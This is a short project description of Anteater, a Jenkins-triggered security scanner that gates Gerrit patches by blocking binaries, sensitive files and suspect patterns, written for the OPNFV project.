blob: 2cbfe5b23a998a859fdae16f5f47517f767517df (plain
CI Gate Security for Gerrit
Anteater performs scanning of any commited patches sent to a gerrit code review
site. Each time a patch is pushed to a repository, jenkins instantiates
anteater, who then performs a series of security checks to each file proposed
in a patch.
Checks consist of verification that no binary / blobs are present. If they are,
they are immediately voted as '-1' (do not merge), until a review has occurred
to insure the binary is safe and its origins are known. Once agreed as safe, a
sha256 checksum is entered into anteaters 'exception' list to insure it is not
maliciously replaced at any given time in the future.
Checks are made to insure the file are not of a sensitive nature, for example
cryptographic keys or application configuration files known to contain
sensitive details, are all blocked from merge.
Finally a deep scan is performed to look for suspect patterns, such as scripts
pulling in file / objects from untrusted sites, or various patterns such as
Anteater uses an open framework to allow users to add new additions easily,
without having to touch any code.
Anteater was developed to address concerns of recent high profile attacks that
have occurred against CI environments, where hackers have backdoor'ed build /
DevOps systems by various means (such as stealing a users ssh key and self
approving patches). By having automated non-human checks in place, it adds an
extra layer of security review with the ability to block a patch merge at gate.
The project is mainly used in the Linux Foundations OPNFV platform, which has
over 40 repositories that need monitoring. Plans are in place to port it to the
github API where it can operate as a review bot as part of a github hosted